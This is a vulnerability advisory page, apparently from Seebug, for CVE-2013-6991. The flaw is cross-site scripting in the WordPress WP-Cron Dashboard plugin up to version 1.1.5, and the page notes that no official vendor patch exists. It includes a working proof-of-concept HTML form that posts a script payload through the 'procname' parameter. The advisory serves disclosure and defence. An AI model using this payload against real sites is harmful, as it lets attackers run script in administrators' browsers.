Lucene search
RootSSV:61227HistoryDec 27, 2013 - 12:00 a.m.
Wordpress WP-Cron Dashboard插件跨站脚本漏洞
2013-12-2700:00:00
Root
www.seebug.org
17
0.002 Low
EPSS
Percentile
60.5%
CVE ID:CVE-2013-6991
WordPress是一款内容管理系统。
由于"procname" HTTP POST参数传递到"/wp-admin/tools.php"脚本的参数未能充分过滤用户提供的数据, 远程攻击者可以欺骗登录的管理员访问恶意链接,在受影响网站的浏览器上下文中执行任意HTML和脚本代码。
0
Wordpress WP-Cron Dashboard<=1.1.5
厂商未提供官方的更新补丁,用户可使用非官方补丁:
The exploitation example below uses the "alert()" JavaScript function to display "immuniweb" word:
<form action="http://[host]/wp-admin/tools.php?page=wp-cron-dashboard" method="post" name="main">
<input type="hidden" name="procname" value='<script>alert("immuniweb");</script>'>
<input type="hidden" name="submit" value='1'>
<input type="submit" id="btn">
</form>
Related
securityvulns
securityvulns
prion
prion
Cross site scripting
2014-01-03 18:54:00
cve
cve
CVE-2013-6991
2014-01-03 18:54:00
patchstack
patchstack
WordPress WP Cron Dashboard Plugin <= 1.1.5 - XSS
2013-12-06 00:00:00
cvelist
cvelist
CVE-2013-6991
2014-01-02 15:00:00
wpvulndb
wpvulndb
WP Cron DashBoard <= 1.1.5 - Reflected Cross-Site Scripting (XSS)
2014-08-01 10:58:35
htbridge
htbridge
Cross-Site Scripting (XSS) in WP-Cron Dashboard Wordpress plugin
2013-12-05 00:00:00
packetstorm
packetstorm
WordPress WP-Cron 1.1.5 Cross Site Scripting
2013-12-26 00:00:00
zdt
zdt
WordPress WP-Cron 1.1.5 Cross Site Scripting Vulnerability
2013-12-27 00:00:00